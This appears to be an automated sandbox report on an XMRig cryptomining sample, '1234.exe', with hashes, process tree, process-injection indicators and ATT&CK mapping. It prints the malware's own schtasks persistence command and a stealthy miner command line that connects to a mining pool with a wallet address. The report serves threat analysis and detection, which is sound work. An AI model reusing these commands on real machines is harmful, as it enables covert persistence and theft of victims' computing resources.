xmrig | 1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

General

Target

1234.exe
Size

2.1MB
MD5

8f7758d7ca504da8622fa77de521ac56
SHA1

33a94c3a952f75695f57a712074941642f6f948f
SHA256

1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512

a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2180-156-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2180-157-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/2180-160-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

services64.exesihost64.exe

pid process

1124 services64.exe
1912 sihost64.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1216 set thread context of 2180 1216 conhost.exe svchost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4476 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

conhost.execonhost.exe

pid process

4040 conhost.exe
1216 conhost.exe
1216 conhost.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

conhost.execonhost.exe

description pid process

Token: SeDebugPrivilege 4040 conhost.exe
Token: SeDebugPrivilege 1216 conhost.exe

pid	process
1124	services64.exe
1912	sihost64.exe

description	pid	process	target process
PID 1216 set thread context of 2180	1216	conhost.exe	svchost.exe

pid	process
4476	schtasks.exe

pid	process
4040	conhost.exe
1216	conhost.exe
1216	conhost.exe

description	pid	process
Token: SeDebugPrivilege	4040	conhost.exe
Token: SeDebugPrivilege	1216	conhost.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

1234.execonhost.execmd.execmd.exeservices64.execonhost.exesihost64.exe

description	pid	process	target process
PID 4160 wrote to memory of 4040	4160	1234.exe	conhost.exe
PID 4160 wrote to memory of 4040	4160	1234.exe	conhost.exe
PID 4160 wrote to memory of 4040	4160	1234.exe	conhost.exe
PID 4040 wrote to memory of 4560	4040	conhost.exe	cmd.exe
PID 4040 wrote to memory of 4560	4040	conhost.exe	cmd.exe
PID 4560 wrote to memory of 4476	4560	cmd.exe	schtasks.exe
PID 4560 wrote to memory of 4476	4560	cmd.exe	schtasks.exe
PID 4040 wrote to memory of 312	4040	conhost.exe	cmd.exe
PID 4040 wrote to memory of 312	4040	conhost.exe	cmd.exe
PID 312 wrote to memory of 1124	312	cmd.exe	services64.exe
PID 312 wrote to memory of 1124	312	cmd.exe	services64.exe
PID 1124 wrote to memory of 1216	1124	services64.exe	conhost.exe
PID 1124 wrote to memory of 1216	1124	services64.exe	conhost.exe
PID 1124 wrote to memory of 1216	1124	services64.exe	conhost.exe
PID 1216 wrote to memory of 1912	1216	conhost.exe	sihost64.exe
PID 1216 wrote to memory of 1912	1216	conhost.exe	sihost64.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1216 wrote to memory of 2180	1216	conhost.exe	svchost.exe
PID 1912 wrote to memory of 2524	1912	sihost64.exe	conhost.exe
PID 1912 wrote to memory of 2524	1912	sihost64.exe	conhost.exe
PID 1912 wrote to memory of 2524	1912	sihost64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\1234.exe
"C:\Users\Admin\AppData\Local\Temp\1234.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4160

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1234.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
4⤵
- Creates scheduled task(s)
PID:4476

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services64.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:312

C:\Users\Admin\services64.exe
C:\Users\Admin\services64.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
7⤵
PID:2524

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=https://pool.hashvault.pro:80 --user=47mixi7RkAmR8pVCzjuTCzVLg6GDsYJGpCEZQ4fDgwfVMBZB4djECiyDZEX6vLmQ4p3KNLUUdiNtaECKeZ9Sb6EvGRJCt7s --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=100 --tls --cinit-stealth
6⤵
PID:2180

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
6f47627be7e8a255543a4f2be8003f83

SHA1
fc5fb148155738d8224103c15a8ef66569be1e10

SHA256
cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c

SHA512
22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
6f47627be7e8a255543a4f2be8003f83

SHA1
fc5fb148155738d8224103c15a8ef66569be1e10

SHA256
cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c

SHA512
22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

Download Submit
C:\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
C:\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
memory/312-130-0x0000000000000000-mapping.dmp

Download
memory/1124-132-0x0000000000000000-mapping.dmp

Download
memory/1216-144-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-145-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-136-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-142-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-139-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-138-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-153-0x0000020363293000-0x0000020363295000-memory.dmp

Filesize
8KB

Download
memory/1216-137-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-152-0x0000020363290000-0x0000020363292000-memory.dmp

Filesize
8KB

Download
memory/1216-154-0x0000020363296000-0x0000020363297000-memory.dmp

Filesize
4KB

Download
memory/1216-155-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1216-158-0x0000020361760000-0x0000020361762000-memory.dmp

Filesize
8KB

Download
memory/1912-149-0x0000000000000000-mapping.dmp

Download
memory/2180-157-0x000000014030F3F8-mapping.dmp

Download
memory/2180-159-0x000001F2B7050000-0x000001F2B7070000-memory.dmp

Filesize
128KB

Download
memory/2180-156-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2180-160-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2524-167-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-169-0x000002518D0B0000-0x000002518D0B6000-memory.dmp

Filesize
24KB

Download
memory/2524-168-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-170-0x000002518D270000-0x000002518D272000-memory.dmp

Filesize
8KB

Download
memory/2524-165-0x000002518EB20000-0x000002518EB22000-memory.dmp

Filesize
8KB

Download
memory/2524-164-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-163-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-161-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-162-0x000002518D240000-0x000002518D242000-memory.dmp

Filesize
8KB

Download
memory/2524-171-0x000002518D273000-0x000002518D275000-memory.dmp

Filesize
8KB

Download
memory/2524-172-0x000002518D276000-0x000002518D277000-memory.dmp

Filesize
4KB

Download
memory/4040-123-0x000001E142560000-0x000001E142561000-memory.dmp

Filesize
4KB

Download
memory/4040-122-0x000001E1406A0000-0x000001E1408C0000-memory.dmp

Filesize
2.1MB

Download
memory/4040-116-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-117-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-118-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-119-0x000001E15B070000-0x000001E15B28C000-memory.dmp

Filesize
2.1MB

Download
memory/4040-121-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-115-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-131-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4040-124-0x000001E142510000-0x000001E142512000-memory.dmp

Filesize
8KB

Download
memory/4040-126-0x000001E142516000-0x000001E142517000-memory.dmp

Filesize
4KB

Download
memory/4040-125-0x000001E142513000-0x000001E142515000-memory.dmp

Filesize
8KB

Download
memory/4040-127-0x000001E140960000-0x000001E140962000-memory.dmp

Filesize
8KB

Download
memory/4476-129-0x0000000000000000-mapping.dmp

Download
memory/4560-128-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads